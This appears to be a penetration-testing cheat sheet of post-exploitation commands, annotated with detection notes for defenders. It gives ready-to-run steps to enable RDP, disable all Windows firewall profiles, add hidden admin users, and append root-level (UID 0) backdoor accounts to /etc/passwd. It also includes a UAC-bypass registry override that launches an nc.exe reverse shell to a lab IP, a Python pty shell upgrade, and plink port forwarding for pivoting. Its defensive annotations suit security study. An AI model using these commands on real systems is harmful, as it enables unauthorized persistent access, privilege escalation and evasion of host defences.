RDP
# Tested on Windows 2003
REM Enable the built-in Remote Desktop service exception in Windows Firewall.
REM "netsh firewall" is the legacy context, which fits the Windows 2003 test
REM target; later Windows releases deprecate it in favour of
REM "netsh advfirewall firewall".
netsh firewall set service type = remotedesktop mode = enable
REM Set fDenyTSConnections (REG_DWORD) to 0 so Terminal Services / RDP
REM connections are no longer denied; /f overwrites without prompting.
REM Defender note: a write to this value together with a firewall change for
REM Remote Desktop is worth alerting on (registry auditing or Sysmon registry
REM events); where RDP is not needed, pin the setting by Group Policy.
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Linux
# Interactive procedure (not a runnable script) that gives a limited shell a
# full terminal. NOTE(review): the page does not say which terminal each step
# is typed in - confirm before documenting it further.
# Defender note: a process command line containing pty.spawn, started by a
# service account such as a web-server user, is a strong sign that someone is
# working interactively in that service's context; execve auditing or EDR
# process telemetry will show it.

# Start bash attached to a new pseudo-terminal through Python's pty module.
python -c 'import pty;pty.spawn("/bin/bash");'
# Keystroke, not a command: Ctrl+Z suspends the foreground job.
ctrl+^z
# Print all current terminal settings, including rows and columns.
stty -a
# Switch the terminal to raw mode with echo turned off.
stty -echo raw
# Bring the suspended job back to the foreground.
fg
# Label, not a command: the remaining lines restore terminal size and
# environment. NOTE(review): may instead stand for a terminal-reset step -
# confirm with the author.
recover
# Set the window size; 26 rows by 136 columns is presumably the author's own
# terminal, so use the values printed by "stty -a" above.
stty rows 26 columns 136
# Export the shell path and terminal type for programs started from here.
export SHELL=/bin/bash
export TERM=xterm-256color
Linux
# Each line appends a passwd entry (name:hash:uid:gid:gecos:home:shell) with
# UID 0 and GID 0, i.e. a second account with root privileges. The password
# hash is placed in /etc/passwd itself rather than in /etc/shadow.
# Writing to /etc/passwd normally requires root; if an unprivileged user can
# do it, the file's permissions are the underlying misconfiguration.
# Defender notes:
#   - any UID 0 entry other than root is a red flag:
#       awk -F: '$3 == 0 {print $1}' /etc/passwd
#   - so is a password field in /etc/passwd that is not "x";
#   - watch writes to /etc/passwd with auditd or file-integrity monitoring.

# Account "test": SHA-512 crypt hash of the literal string "password",
# generated by mkpasswd.
echo test:$(mkpasswd -m sha-512 password):0:0:root:/root:/bin/bash >> /etc/passwd
# Account "user1": SHA-512 crypt hash (-6) produced by openssl with the fixed
# salt "fdsafdsa".
echo user1:$(openssl passwd -6 -salt fdsafdsa password):0:0:root:/root:/bin/bash >> /etc/passwd
Windows
# Add a local administrator user and add it to the "Remote Desktop Users" group
REM Create a local account. The password is passed as a command-line
REM argument, so it ends up wherever process command lines are logged.
net user <username> <password> /add
REM Add the account to the local Administrators group.
net localgroup administrators <username> /add
REM Add the account to the group that is allowed to log on over RDP.
net localgroup "Remote Desktop Users" <username> /add
REM Defender note: with account-management auditing enabled, the Security log
REM records the creation as event 4720 and each group addition as event 4732.
REM An unexpected new member of Administrators should be treated as an incident
REM (MITRE ATT&CK T1136.001, Create Account: Local Account).
REM Turn Windows Firewall off for every profile (domain, private and public).
REM Defender note: this removes host-level filtering for all inbound traffic,
REM not just one port. Enforce the firewall state through Group Policy and
REM alert on profile state changes (MITRE ATT&CK T1562.004).
netsh advfirewall set allprofiles state off
REM List entries in the current directory that carry the hidden attribute.
dir /A:H
# Run the following commands from the c:\users\ directory
REM Recursive (/s), bare-format (/b) listing of hidden entries (/a:h); findstr
REM drops every path containing "appdata", case-insensitively (/i /v).
dir /a:h /b /s | findstr /i /v "appdata"
REM The same listing without the attribute filter.
dir /b /s | findstr /i /v "appdata"
# Set the default (unnamed) value of the key "HKCU\Software\Classes\ms-settings\shell\open\command"
REM Per-user override of the ms-settings protocol handler: the key's default
REM value becomes a command line that starts nc.exe with cmd.exe attached,
REM connecting to 192.168.119.129 port 443 (a private address, presumably the
REM author's lab host). /f overwrites without prompting.
REM Defender note: a shell\open\command override under HKCU\Software\Classes
REM combined with a DelegateExecute value is a documented UAC-bypass pattern
REM (MITRE ATT&CK T1548.002). This key does not normally exist under HKCU, so
REM any write to it is a high-fidelity detection. Setting UAC to
REM "Always notify" and keeping daily-use accounts out of the local
REM Administrators group removes the precondition.
reg add HKCU\Software\Classes\ms-settings\shell\open\command /d "nc.exe -e cmd.exe 192.168.119.129 443" /f
#Assign value name "DelegateExecute" to key "HKCU\Software\Classes\ms-settings\shell\open\command"
REM Create the DelegateExecute value with no data. There is no /f here, so reg
REM asks for confirmation if the value already exists.
reg add HKCU\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute"
Windows remote port forwarding
REM Open an SSH session from the Windows host to "your host" with a remote
REM forward (-R): port 1234 on the SSH server side is relayed through this
REM session to port 8080 on "target host".
REM The -pw option puts the SSH password on the command line, where process
REM listings and process-creation logs can capture it.
REM Defender note: plink.exe running on a host that has no administrative need
REM for it, or outbound SSH from workstations and servers in general, should be
REM blocked by egress filtering and alerted on (MITRE ATT&CK T1572).
plink.exe -ssh -l <username> -pw <passwd> -R <your host>:1234:<target host>:8080 <your host> -P <port>
Windows
REM Reboot the machine (/r) with a zero-second delay (/t 0).
REM Defender note: an unplanned reboot leaves a record in the System event
REM log; correlate it with the registry and account changes made before it.
shutdown /r /t 0